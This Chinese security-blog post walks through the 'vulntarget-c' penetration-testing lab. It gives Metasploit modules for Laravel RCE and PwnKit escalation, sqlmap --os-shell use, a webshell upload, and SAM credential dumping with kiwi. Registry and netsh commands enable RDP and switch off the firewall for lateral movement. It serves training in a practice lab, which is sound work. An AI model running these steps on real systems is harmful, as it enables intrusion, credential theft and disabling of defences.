freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

vulntarget-c
热烈的马 2022-08-20 17:09:11 136063
所属地 辽宁省

前言:

每个人都有属于自己的一片森林,也许我们从来不曾去过,但它一直在那里,总会在那里,迷失的人迷失了,相逢的人会再相逢,即使是你最心爱的人,心中都有一片你无法到达的森林。

*本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

nmap -sC -sV -Pn 192.168.25.137

只开放了22、80端口,访问80端口

1660981408_630090a0d4e8c9a7ad0c4.png!small?1660981408323

直接访问80端口,是laravel框架

1660981494_630090f6581eb94d1df94.png!small?1660981493321

直接使用exp,或者msf自带的模块进行利用

使用msf的模块 exploit/multi/php/ignition_laravel_debug_rce
然后反弹shell,上线msf方便后续提权

二、反弹shell

1660982487_630094d79f95b45e23339.png!small?1660982486806

1660982495_630094dfc22e2af84ca4c.png!small?1660982494789

对于提权,方法就多了,这里直接用msf的模块进行提权

这个模块辅助提权 post/multi/recon/local_exploit_suggester

使用这个模块直接提权 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

1660982915_630096832163e53e4cf3e.png!small?1660982914229

接下来查看一下路由,然后添加路由

run get_local_subnets

run post/multi/manage/autoroute

1660982973_630096bdad2c7b9958983.png!small?1660982972693

对其进行网络探测,这里也用msf的模块,也可以用别的方法

这里探测内网主机 10.0.20.0/24

这里创建一个用户,然后设置一个代理1660983619_63009943df488e7da7dae.png!small?1660983619285访问10.0.20.100这个ip地址

1660983656_63009968e4713cdb6eb94.png!small?1660983656227

https://www.exploit-db.com/exploits/50644

漏洞如上,直接sqlmap

sqlmap -u "http://10.0.20.100/admin/inquiries/view_details.php?id=1*" --random-agent

1660983789_630099ed5e1b695c92e12.png!small?1660983788510

查看dba是true,直接尝试一下--os-shell

靶场竟遇到可以直接--os-shell的,然后就上传webshell吧

上传shell后查看,system的权限,

收集一下信息,查看一下杀软信息,有个杀软,是defener

1660984176_63009b703acd25e48d048.png!small?1660984175185

先弄个免杀上线msf,然后在继续收集信息1660984383_63009c3fe4eb2583a6267.png!small?1660984383059

三、内网横向

没有域环境,只是工作组,抓取一下密码,看看远程桌面

load kiwi

lsa_dump_sam

1660984778_63009dca3d6d7be0fad3e.png!small?1660984777245

开启3389

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭防火墙

netsh firewall set opmode mode=disable

防火墙恢复默认配置

netsh firewall reset

查看防火墙状态

Netsh Advfirewall show allprofiles

但是无法登录,应该是要和windows版本一致才可以登录

那就先看一下路由,添加路由,在看看网段存活主机

挂一个代理,对其进行端口探测1660985522_6300a0b2dad71f5889997.png!small?1660985522170后面也没有啥东西,最后网上搜索到远程桌面的解决方法,进行登录,

在这个软件中发现了10.0.10.110(打开需要密码,登录密码就是上面抓取的密码)

1660986398_6300a41e521b58e47f95e.png!small?1660986397827

1660986446_6300a44e7f2ac49102da9.png!small?1660986445446

后面的操作就是提权了,和上面类似。



# 靶场实战 # 靶场攻关
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 热烈的马 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
内网靶场
热烈的马 LV.6
这家伙太懒了,还未填写个人描述!
  • 45 文章数
  • 18 关注者
关于Windows中获取指定进程pid的几种方法
2023-08-04
利用NtDuplicateObject进行Dump
2023-04-05
NTLM中继
2023-03-31
文章目录